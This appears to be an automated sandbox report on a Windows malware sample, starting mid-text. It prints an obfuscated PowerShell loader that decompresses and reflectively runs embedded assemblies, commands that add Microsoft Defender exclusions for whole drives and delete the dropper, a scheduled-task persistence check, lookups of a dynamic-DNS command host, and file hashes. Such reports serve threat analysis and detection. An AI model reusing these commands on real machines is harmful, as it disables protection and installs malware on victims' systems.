System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2324);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network42453Man')

Network

Country Destination Domain Proto
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 29.81.57.23.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 moonli.ddnsking.com udp
US 8.8.8.8:53 moonli.ddnsking.com udp
US 8.8.8.8:53 moonli.ddnsking.com udp
US 8.8.8.8:53 moonli.ddnsking.com udp
US 8.8.8.8:53 moonli.ddnsking.com udp
US 8.8.8.8:53 moonli.ddnsking.com udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 moonli.ddnsking.com udp
US 8.8.8.8:53 moonli.ddnsking.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

memory/3924-4-0x00000000053A0000-0x00000000053D6000-memory.dmp

memory/3924-5-0x0000000075160000-0x0000000075910000-memory.dmp

memory/3924-6-0x0000000003300000-0x0000000003310000-memory.dmp

memory/3924-7-0x0000000005A10000-0x0000000006038000-memory.dmp

memory/3924-8-0x0000000005940000-0x0000000005962000-memory.dmp

memory/3924-9-0x0000000006040000-0x00000000060A6000-memory.dmp

memory/3924-15-0x00000000061A0000-0x0000000006206000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnoef2aw.j2l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3924-20-0x0000000006210000-0x0000000006564000-memory.dmp

memory/3924-21-0x0000000006800000-0x000000000681E000-memory.dmp

memory/3924-22-0x0000000006840000-0x000000000688C000-memory.dmp

memory/3924-23-0x0000000003300000-0x0000000003310000-memory.dmp

memory/3924-24-0x0000000009E60000-0x000000000A4DA000-memory.dmp

memory/3924-25-0x0000000006E10000-0x0000000006E2A000-memory.dmp

memory/3924-26-0x0000000075160000-0x0000000075910000-memory.dmp

memory/3924-27-0x0000000005640000-0x000000000564E000-memory.dmp

memory/3924-29-0x0000000077B81000-0x0000000077CA1000-memory.dmp

memory/3924-30-0x0000000009B70000-0x0000000009D6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

memory/3924-32-0x0000000003300000-0x0000000003310000-memory.dmp

memory/3924-33-0x0000000003300000-0x0000000003310000-memory.dmp

memory/860-34-0x0000000075160000-0x0000000075910000-memory.dmp

memory/860-35-0x0000000002400000-0x0000000002410000-memory.dmp

memory/4224-36-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

memory/4224-37-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

memory/4224-47-0x0000000075160000-0x0000000075910000-memory.dmp

memory/4224-57-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

memory/3924-58-0x0000000003300000-0x0000000003310000-memory.dmp

memory/4224-59-0x0000000007290000-0x00000000072C2000-memory.dmp

memory/4224-60-0x000000007F820000-0x000000007F830000-memory.dmp

memory/4224-61-0x0000000070F80000-0x0000000070FCC000-memory.dmp

memory/4224-71-0x00000000066B0000-0x00000000066CE000-memory.dmp

memory/4224-72-0x00000000072D0000-0x0000000007373000-memory.dmp

memory/4224-73-0x0000000007470000-0x000000000747A000-memory.dmp

memory/3924-74-0x0000000077B81000-0x0000000077CA1000-memory.dmp

memory/4224-75-0x00000000076A0000-0x0000000007736000-memory.dmp

memory/4224-76-0x0000000007620000-0x0000000007631000-memory.dmp

memory/860-77-0x0000000075160000-0x0000000075910000-memory.dmp

memory/4224-79-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

memory/860-78-0x0000000002400000-0x0000000002410000-memory.dmp

memory/4224-80-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

memory/4224-81-0x0000000075160000-0x0000000075910000-memory.dmp

memory/4224-83-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

memory/4224-84-0x0000000007650000-0x000000000765E000-memory.dmp

memory/4224-85-0x0000000007660000-0x0000000007674000-memory.dmp

memory/4224-86-0x0000000007760000-0x000000000777A000-memory.dmp

memory/4224-87-0x0000000007740000-0x0000000007748000-memory.dmp

memory/4224-89-0x0000000075160000-0x0000000075910000-memory.dmp

memory/4760-90-0x0000000075160000-0x0000000075910000-memory.dmp

memory/4760-91-0x00000000048B0000-0x00000000048C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 353251515e65be2ff4989493f9d935d5
SHA1 e631e54e9dd81dd8bb319cb8b993c98203e91597
SHA256 7e2ba5c81969ab85a57900abffdcd19e8d71d06ff555440894da71eb83fe968e
SHA512 1e034f44255e011d830ad159ee69a900d755f33730963e90214e94a39af122516c56c6af477adcbc4f1f2ee567eafe88451303bd7fb853db65ff51904aafc987

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/4760-103-0x000000007FD40000-0x000000007FD50000-memory.dmp

memory/4760-104-0x0000000070F80000-0x0000000070FCC000-memory.dmp

memory/4760-106-0x00000000048B0000-0x00000000048C0000-memory.dmp

memory/4760-116-0x0000000075160000-0x0000000075910000-memory.dmp

memory/4996-117-0x0000000075160000-0x0000000075910000-memory.dmp

memory/4996-118-0x00000000051A0000-0x00000000051B0000-memory.dmp

memory/4996-119-0x00000000051A0000-0x00000000051B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a0e04953ede77bd514ab2b4fb98ed462
SHA1 5e54f266da2333315f6d26bac6146cb926f8b5ab
SHA256 d7b3698e20d2614a9f126c7c4481964202af3f2134668edbd094480118ddf058
SHA512 cdd527ab23efdc410db1eabbeb9f8c106b5e6cee4f2af74f0a8502ccb0ea9bdd1e63d6bd15f1c321a84be6bc55300d1380b1b8e2a0c9d805d1dc37e5e6d3825a

memory/4996-130-0x0000000070F80000-0x0000000070FCC000-memory.dmp

memory/4996-140-0x00000000051A0000-0x00000000051B0000-memory.dmp

memory/4996-142-0x0000000075160000-0x0000000075910000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c2a7cb16ad143e4f9f319c8416955a44
SHA1 ac4be445b8bfe2bd1773f53110aa59c066013237
SHA256 68d3b721b0f3a434db356eb0c16f17903bb461fd814c4242f7d7c55d2065a070
SHA512 11f9fc68c783f9a3760c70179bfc52c25b0c3b7afd90868f1faf3ea3dd4d27864394edd30db351f58d6df10bbb63b8616430fca71a21b5ab2aeeb403c53e24c6

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd

MD5 12d05ccce56b71317838c1f70c434fdd
SHA1 db2b6548661dc0ad3c19439989e1c36bf62a9ca7
SHA256 c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e
SHA512 79c4c072efba2838d053dd3912484e4138371eac29bd556e344c62abc1b49313bf562fcc6c613c7756c6d24ecc4203336da5aacaf9d4602eb8c5d6caa45053b2

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

memory/2324-154-0x0000000075160000-0x0000000075910000-memory.dmp

memory/2324-155-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

memory/2324-156-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c2a7cb16ad143e4f9f319c8416955a44
SHA1 ac4be445b8bfe2bd1773f53110aa59c066013237
SHA256 68d3b721b0f3a434db356eb0c16f17903bb461fd814c4242f7d7c55d2065a070
SHA512 11f9fc68c783f9a3760c70179bfc52c25b0c3b7afd90868f1faf3ea3dd4d27864394edd30db351f58d6df10bbb63b8616430fca71a21b5ab2aeeb403c53e24c6

memory/3924-167-0x0000000075160000-0x0000000075910000-memory.dmp

memory/860-168-0x0000000002400000-0x0000000002410000-memory.dmp

memory/860-169-0x0000000005F80000-0x0000000005FA2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 44f0c2fadcb59edf6d0e65a9030c446a
SHA1 b10b258678afe1d545da4309f0127061935369bc
SHA256 7d7411d9f6729c5bc44dfe9bd47675c4a205e1c5d1f84d464d10f50a4f2fd10f
SHA512 766f8a51ef0f640159ec139f53b264881813f95a1b1b83aae159cfb317b4f4d15ff7833206f55ec61e3426e7e5a41d5f9f914bdd89c20765c5e0c3eb36e29d27

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3313e1b2690f1a9860ec7268b0d6e056
SHA1 751eda9b6e37337062055274495a5a9f6c99e6fb
SHA256 b22f6749c76593a599d5fddeb01fcc387be5d4df8fc8261ae316c61c331e2ec4
SHA512 b45c3aab6b41d53bfefb16abc10af660b0315055e8e65f7d3ffaebd479d9371a65502a14acfa3c91730fefaf30cc7914a5fad01a60d68536994d92d8806e50a1

memory/2324-249-0x0000000000400000-0x00000000007CE000-memory.dmp